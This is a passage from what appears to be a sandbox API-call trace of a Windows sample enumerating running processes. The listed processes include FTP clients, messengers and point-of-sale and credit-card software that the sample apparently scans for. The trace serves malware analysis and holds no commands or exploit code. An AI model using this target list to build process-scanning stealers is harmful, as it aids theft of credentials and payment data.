lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0184.017] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0184.019] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0184.022] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0184.024] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0184.026] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0184.028] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0184.031] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0184.033] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0184.035] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0184.037] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0184.039] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0184.041] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0184.043] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0184.045] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0184.047] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0184.049] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0184.051] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0184.052] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0184.093] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0184.097] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0184.099] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0184.100] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0184.102] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0184.105] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0184.107] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.109] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.110] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0184.112] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.113] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.115] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0184.117] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.119] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0184.121] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0184.122] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.124] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.126] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0184.128] CloseHandle (hObject=0x17ec) returned 1 [0184.128] Sleep (dwMilliseconds=0x64) [0184.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0184.219] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.221] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.222] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.224] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.229] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.230] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.232] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.234] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.235] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.237] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.239] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.240] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.242] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.244] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.289] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.291] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.293] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.294] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.296] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.298] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0184.300] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.301] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0184.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.305] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0184.307] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0184.308] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0184.311] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.313] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0184.314] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.316] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.318] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.319] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0184.321] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.365] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.367] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.369] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0184.371] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0184.372] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0184.374] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0184.376] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0184.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0184.379] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0184.380] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0184.382] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0184.384] Process32Next (in: 